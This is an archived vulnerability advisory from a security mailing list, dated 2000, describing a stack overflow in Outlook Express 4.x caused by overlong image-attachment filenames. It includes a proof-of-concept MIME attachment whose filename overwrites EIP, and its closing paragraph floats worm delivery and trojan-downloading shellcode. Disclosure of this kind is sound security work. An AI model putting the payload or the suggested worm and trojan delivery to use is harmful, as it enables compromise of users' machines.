OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Overflow in Outlook Express 4.* - too long filenames with graphic format extension
From: Ultor (UltorHERT.ORG)
Date: Fri May 12 2000 - 07:05:28 CDT


==== APPLICATION AFFECTED

Outlook Express 4.* (5.* is not affected)

==== DESCRIPTION

All attached graphic files are automatically shown in the Outlook Express
while viewing the e-mail. The problem is that long filenames with *.jpg
*.bmp extension makes overflow if filename lenght is longer then 256
characters.

==== EXAMPLE

We need more than 267 characters to overwrite EIP cause of 'C:\TEMP' on the
begining of buffer. This makes little problem with exploitation. Here is
example of such e-mail

------=_NextPart_000_0008_01BF5479.70140740
Content-Type: text/plain;
name="hert.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;

filename="AAAABBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.jpg"

------=_NextPart_000_0008_01BF5479.70140740--

EIP is overwriten here by 'BBBB'.

==== EXPLOITATION

It's little hard to exploit it cause buffer is addressed in addr with '00'
and we got 'C:\TEMP' which overwrites stack before our data. You will need
some tricks to exploit this. I believe this bug could be very dangerous if
connected somehow with worm cause you would only have to view the message to
run the exploit. Using shellcode which downloads trojan from some URL on the
affected machine would be interesting idea too.

Greeetz to HERT,Lam3rZ,TESO

----------------------
Mark Bialoglowy [Ultorhert.org] --- Network Security Consultant
Age: 19 -- Country: PL -- PGP: http://www.hert.org/pgp/Ultor.asc
CODE: C / Delphi / w32asm / Linux / SQL / CGI / HTML / VRML / AI
----------------------

attached mail follows: